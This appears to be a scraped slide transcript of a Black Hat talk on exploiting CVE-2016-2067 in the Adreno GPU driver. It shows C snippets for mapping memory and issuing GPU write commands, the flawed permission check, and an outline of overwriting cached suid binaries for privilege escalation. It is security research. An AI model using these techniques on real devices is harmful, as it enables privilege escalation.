gpu security exposed - black hat briefings€¦ · gpu security exposed exploiting shared memory...
TRANSCRIPT
![Page 1: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/1.jpg)
1 . 1
GPU Security ExposedExploiting Shared Memory
Justin Taft
![Page 2: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/2.jpg)
2 . 1
Presentation OverviewShared Memory Internals
GPU Command Processor
Exploiting CVE-2016-2067
![Page 3: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/3.jpg)
3 . 1
Shared MemoryIn software terms, it's a region of physical memory shared bytwo or more processes.
In hardware terms, it's a region of physical memory sharedby two or more hardware components.
![Page 4: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/4.jpg)
4 . 1
Shared Memory - Hardware Overview
![Page 5: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/5.jpg)
5 . 1
Memory Management Unit (MMU)Hardware component the CPU interacts with when accessingmemory.
Translates virtual addresses to physical addresses.
Enforces page table entry flags (read/write,execute, etc.).
![Page 6: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/6.jpg)
6 . 1
Input Output Memory Management Unit(IOMMU)
Hardware component the GPU interacts with when accessingmemory.
Can be configured to map an address range to systemmemory (RAM) used by the CPU.
Prevents Direct Memory Access (DMA) attacks by limitingwhat memory the GPU can access.
![Page 7: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/7.jpg)
7 . 1
Sharing Memory with the Adreno GPU
![Page 8: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/8.jpg)
8 . 1
Interfacing with the Graphics DriverDriver interface exposed through device file /dev/kgsl-3d0.
Commands are issued via ioctl() calls.
File has global read and write permissions.
![Page 9: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/9.jpg)
9 . 1
Creating a Shared Memory Mapping struct kgsl_map_user_mem sharedMemory = {
.hostptr = dataToShare, //MUST BE PAGE ALIGNED
.len = pageSize, //MUST BE MULTIPLE OF PAGE LENGTH
.memtype = KGSL_USER_MEM_TYPE_ADDR, //MEMORY PAGE BEING MAPPED IS //ALREADY OWNED BY USER PROCESS
.gpuaddr = 0, //UPDATED BY IOCTL CALL };
ioctl(kgsl3dfd, IOCTL_KGSL_MAP_USER_MEM, &sharedMemory);
![Page 10: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/10.jpg)
10 . 1
GPU Command Processor
![Page 11: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/11.jpg)
11 . 1
GPU Command ProcessorProcess instructions in order to draw graphics and configureinternal settings of the GPU.
Higher level APIs (OpenGL) provide abstraction forimplementation details.
Command Processor instructions are not standardized.
![Page 12: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/12.jpg)
12 . 1
Writing to GPU Memory from the CommandProcessor
#define ADD_CMD(x) *cmdsPtr++ = x; cmdCount++; unsigned int* cmdsStart = mmap(0, 4096, PROC_READ | PROC_WRITE, MAP_ANONYMOUS, 0, 0);
unsigned int* cmdsPtr = cmdsStart;
//Macros defined by driver. cp_type3_packet does some bit shifting and flipping. ADD_CMD(cp_type3_packet(CP_MEM_WRITE, 2));
ADD_CMD(targetGpuAddress); //GPU address to write to ADD_CMD(0xaabbccdd); //Value to write
![Page 13: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/13.jpg)
13 . 1
Sending the Commandsstruct kgsl_drawctxt_create ctxt = { .flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC, .drawctxt_id = 0, }; lstIoctlRet = ioctl(kgsl3dfd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctxt);
struct kgsl_ibdesc ibdesc = { .gpuaddr = mapping.gpuaddr, .sizedwords = cmdsPtr - cmdsPtrStart };
struct kgsl_ringbuffer_issueibcmds ibcmds = { .drawctxt_id = ctxt.drawctxt_id, .ibdesc_addr = (unsigned int) &ibdesc, .numibs = 1, .flags = KGSL_CONTEXT_SUBMIT_IB_LIST, .timestamp = 0, }; ioctl(kgsl3dfd, IOCTL_KGSL_RINGBUFFER_ISSUEIBCMDS, &ibcmds));
![Page 14: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/14.jpg)
14 . 1
The Vulnerability
![Page 15: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/15.jpg)
15 . 1
CVE-2016-2067The Adreno graphics driver maps memory pages marked as
read-only by the CPU as writable by the GPU.
![Page 16: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/16.jpg)
16 . 1
Read/Write Permission Checkstatic int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile) { ...
//BUG: Check is inverted. Write access is interperted as read access. int write = (memdesc->flags & KGSL_MEMFLAGS_GPUREADONLY) != 0; ...
//Pin memory in place, verify write permissions. npages = get_user_pages(current, current->mm, memdesc->useraddr, sglen, write, 0, pages, NULL); ret = (npages < 0) ? (int)npages : 0; ...
return ret; }
![Page 17: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/17.jpg)
17 . 1
IOMMU Configurationstatic int kgsl_iommu_map(struct kgsl_pagetable *pt, struct kgsl_memdesc *memdesc) { int ret = 0; unsigned int protflags; ...
/* Set up the protection for the page(s) */ protflags = IOMMU_READ;
if (!(memdesc->flags & KGSL_MEMFLAGS_GPUREADONLY)) protflags |= IOMMU_WRITE; ...
ret = iommu_map_range(iommu_pt->domain, iommu_virt_addr, memdesc->sg, size, protflags); ... }
![Page 18: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/18.jpg)
18 . 1
The Exploit
![Page 19: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/19.jpg)
19 . 1
Modifying Dynamic LibrariesUse dlopen() and dlsym() to load dynamic library and locatesymbols addresses.
Instructions for these symbols can be overwritten , such as__android_log_print in liblog.so.
Some privileged binaries are statically linked.
![Page 20: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/20.jpg)
20 . 1
We can do better…
![Page 21: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/21.jpg)
21 . 1
Modifying the Disk Cachemmap() can be used to map files into memory.
Contents of file are cached in memory for other processes touse.
By mmap()-ing a suid binary, instructions in privilegedbinaries can be over-written through the GPU.
Changes aren't stored to disk.
![Page 22: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/22.jpg)
22 . 1
Demonstration
![Page 23: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/23.jpg)
23 . 1
TakeawaysShared memory is hard to get right.
Direct memory attacks are very powerful.
Graphic security has a large attack surface.
![Page 24: GPU Security Exposed - Black Hat Briefings€¦ · GPU Security Exposed Exploiting Shared Memory Justin Taft. 2 . 1 Presentation Overview Shared Memory Internals GPU Command Processor](https://reader033.vdocument.in/reader033/viewer/2022042314/5f02876e7e708231d404b713/html5/thumbnails/24.jpg)
24 . 1
References"Understanding Modern GPUs" (Óscar Blasco Maestro)
"ARM, DMA, and memory management" (Jonathan Corbet)
https://traxnet.wordpress.com/2011/07/16/understanding-modern-gpus-1/
https://lwn.net/Articles/440221/
http://nommu.org/memory-faq.txt